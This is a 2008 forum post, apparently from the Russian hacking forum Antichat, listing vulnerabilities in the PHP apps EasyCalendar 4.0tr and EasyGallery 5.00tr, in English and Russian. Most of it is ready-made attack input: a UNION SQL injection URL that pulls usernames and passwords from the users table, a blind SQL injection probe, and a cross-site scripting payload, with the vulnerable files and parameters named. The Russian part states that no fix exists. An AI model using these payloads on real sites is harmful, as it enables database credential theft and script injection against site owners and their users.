Показать сообщение отдельно

  #50  
Старый 14.03.2008, 23:14
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities
-------------------------------
HomePage: http://myiosoft.com
Exploit: Multiple Remote Vulnerabilities [High]
Verified in localhost with EsayCalendar 4.0tr and magic_quotes Off
Remote SQL Injection:

Vuln File: calendar_backend.php
Exploit:
PHP код:
http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&month=2&year=-1[SQL] 
Example:
PHP код:
-1+union+all+select+1,2,3,concat(username,char(54),password),5,6,7,8,9,0,1+from+dbpfixajaxp_users/* 
-------------------------------------
Blind SQL Injection:

Vuln File: ajaxp_backend.php

Exploit:
PHP код:
http://localhost/PATH/ajaxp_backend.php?page=[BLIND] 
Example:
PHP код:
1+and+1%3D0 
-------------------------------------
Cross Site Scripting:

Vuln File: calendar_backend.php
Exploit:
PHP код:
http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&day=[XSS] 
Example:
PHP код:
>'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt> 
=========================================
EasyGallery 5.00tr
возможно более ранние версии

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "catid" в сценарии staticpages/easygallery/index.php (когда параметр "page" установлен в значение "category"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

PHP код:
http://[host]/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL] 
2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "q" и в URL в сценарии staticpages/easygallery/index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: myiosoft.com/?1.9.0.0

Решение: Способов устранения уязвимости не существует в настоящее время.

=============================================

Последний раз редактировалось xcedz; 15.03.2008 в 01:59..
 
Ответить с цитированием